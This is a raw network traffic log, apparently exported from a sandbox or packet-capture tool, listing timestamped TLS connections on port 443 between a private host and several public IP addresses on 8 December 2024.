                                                                          Dec 8, 2024 20:51:12.937892914 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.937903881 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.937932968 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.937953949 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.955593109 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.955607891 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.955682993 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.955693960 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.955739975 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.971151114 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.971170902 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.971235991 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.971254110 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.971281052 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.971308947 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.990339994 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.990355015 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.990421057 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.990437031 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:12.990470886 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:12.993729115 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.007147074 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.007162094 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.007241964 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.007250071 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.007289886 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.013478041 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.013535976 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.013550043 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.013591051 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.017736912 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.021143913 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.021155119 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.021166086 CET49793443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.021174908 CET4434979313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.191947937 CET4434979420.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.191972017 CET4434979420.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.192015886 CET49794443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.192054033 CET4434979420.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.192065001 CET49794443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.192065954 CET4434979420.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.192095995 CET49794443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.192123890 CET49794443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.202291965 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.202333927 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.202394009 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.205560923 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.205569029 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.205598116 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.205600023 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.205651045 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.205677986 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.207895041 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.207933903 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.207986116 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.208360910 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.208373070 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.208483934 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.208494902 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.208796978 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.208811045 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.209053993 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.209064960 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.210145950 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.210156918 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.210211992 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.210341930 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:13.210349083 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:13.211205959 CET49794443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.211215019 CET4434979420.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.244723082 CET44349799172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:13.244807959 CET44349799172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:13.244858027 CET49799443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:13.245814085 CET49799443192.168.2.4172.67.215.208
                                                                          Dec 8, 2024 20:51:13.245850086 CET44349799172.67.215.208192.168.2.4
                                                                          Dec 8, 2024 20:51:13.313510895 CET4434979520.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.313575983 CET49795443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.313616991 CET4434979520.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.313671112 CET49795443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.313854933 CET4434979520.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.313895941 CET49795443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.313910007 CET4434979520.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.313951015 CET49795443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.314014912 CET49795443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.314029932 CET4434979520.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.320425034 CET4434979720.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.320444107 CET4434979720.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.320480108 CET49797443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.320513010 CET4434979720.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.320525885 CET4434979720.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.320527077 CET49797443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.320545912 CET49797443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.320571899 CET49797443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.320914984 CET49797443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.320928097 CET4434979720.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.331012964 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.331111908 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.331146955 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.331154108 CET49800443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:13.331173897 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.331213951 CET49800443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:13.339847088 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.345966101 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.346008062 CET49800443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:13.346020937 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.355360985 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.355403900 CET49800443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:13.355417967 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.355546951 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.359316111 CET49800443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:13.370873928 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.370903015 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.370920897 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.370943069 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.370980024 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.370987892 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.371031046 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.389329910 CET49800443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:13.389357090 CET44349800104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:13.540774107 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.540884018 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.540904045 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.540916920 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.540946007 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.540976048 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.541512012 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.541527033 CET4434979620.223.35.26192.168.2.4
                                                                          Dec 8, 2024 20:51:13.541534901 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.541574955 CET49796443192.168.2.420.223.35.26
                                                                          Dec 8, 2024 20:51:13.570465088 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:13.570502996 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:13.570559025 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:13.571280956 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:13.571296930 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:14.796448946 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:14.797950029 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:14.797966957 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:14.799026012 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:14.799088001 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:14.801702976 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:14.801778078 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:14.804974079 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:14.804982901 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:14.846638918 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:14.925618887 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.926142931 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.926170111 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.926862001 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.926866055 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.959760904 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.960267067 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.960299015 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.960841894 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.960845947 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.963246107 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.963593006 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.963622093 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.964348078 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.964354038 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.965208054 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.966021061 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.966044903 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.966461897 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.966466904 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.967139959 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.967452049 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.967469931 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:14.968096018 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:14.968101025 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.103338957 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.103368044 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.103385925 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.103425980 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.103497028 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.103549004 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.103672028 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.103707075 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.103759050 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.103781939 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.103809118 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.103866100 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.104176998 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.104185104 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.104249001 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.111737013 CET49812443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.111752033 CET44349812150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.111955881 CET49811443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.111969948 CET44349811150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.112021923 CET49813443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.112044096 CET44349813150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.112061977 CET49810443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.112073898 CET44349810150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.112112045 CET49814443192.168.2.4150.171.27.10
                                                                          Dec 8, 2024 20:51:15.112121105 CET44349814150.171.27.10192.168.2.4
                                                                          Dec 8, 2024 20:51:15.265885115 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.265943050 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.265985012 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.265999079 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.266010046 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.266082048 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.266088009 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.274444103 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.274503946 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.274516106 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.283123016 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.283323050 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.283334017 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.291929007 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.291976929 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.291985035 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.346234083 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.371607065 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.371630907 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.371680975 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.371701002 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.372057915 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.372068882 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.372169971 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.372239113 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.372276068 CET4434980513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.372322083 CET49805443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.376581907 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.376626015 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.376720905 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.378622055 CET49815443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.378637075 CET4434981513.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.405903101 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.405963898 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.406449080 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.406734943 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.406755924 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.406766891 CET49803443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.406773090 CET4434980313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.407335043 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.407357931 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.407422066 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.407445908 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.407494068 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.407598019 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.407603025 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.407635927 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.407728910 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.407767057 CET4434980413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.407906055 CET49804443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.412225008 CET49816443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.412269115 CET4434981613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.412342072 CET49816443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.413213968 CET49816443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.413229942 CET4434981613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.417115927 CET49817443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.417136908 CET4434981713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.417305946 CET49817443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.417535067 CET49817443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.417546034 CET4434981713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.439120054 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.439183950 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.439296961 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.452996969 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.453020096 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.453083992 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.453114986 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.453164101 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.508135080 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.508178949 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.508197069 CET49806443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.508203030 CET4434980613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.509535074 CET49802443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.509558916 CET4434980213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.513235092 CET49818443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.513263941 CET4434981813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.513525009 CET49818443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.517858028 CET49819443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.517904043 CET4434981913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.518012047 CET49819443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.519826889 CET49818443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.519841909 CET4434981813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.519902945 CET49819443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:15.519926071 CET4434981913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:15.608402967 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.612621069 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.612684011 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.612694025 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.621324062 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.621395111 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.621400118 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.630104065 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.630156040 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.630165100 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.639002085 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.639082909 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.639091969 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.647795916 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.647861004 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.647866964 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.656506062 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.656569004 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.656575918 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.665518999 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.665575027 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.665584087 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.682784081 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.682868958 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.682879925 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.728995085 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.729074001 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.729085922 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.753192902 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.753242016 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.753251076 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.757566929 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.757632017 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.757639885 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.775094986 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.775173903 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.775182962 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.783781052 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.783830881 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.783842087 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.828563929 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.828572989 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.848920107 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.849020958 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.849031925 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.870274067 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.870282888 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.870373964 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.870383978 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.874849081 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.874928951 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.874934912 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.875145912 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.878624916 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.887079000 CET44349807104.17.25.14192.168.2.4
                                                                          Dec 8, 2024 20:51:15.887161016 CET49807443192.168.2.4104.17.25.14
                                                                          Dec 8, 2024 20:51:15.887172937 CET44349807104.17.25.14192.168.2.4
